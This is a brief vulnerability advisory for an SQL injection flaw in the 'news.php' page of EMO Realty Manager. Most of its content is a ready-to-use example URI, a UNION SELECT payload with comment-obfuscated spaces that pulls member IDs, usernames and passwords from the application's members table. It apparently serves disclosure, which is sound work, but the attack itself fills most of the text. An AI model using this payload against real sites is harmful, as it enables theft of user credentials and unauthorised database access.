EMO Realty Manager 'news.php' SQL Injection Vulnerability

EMO Realty Manager 'news.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/path/pages/news.php?ida=-1/**/union/**/select/**/1,2,concat_ws(0x3a3a,id,member_name,member_password),4/**/from/**/members/*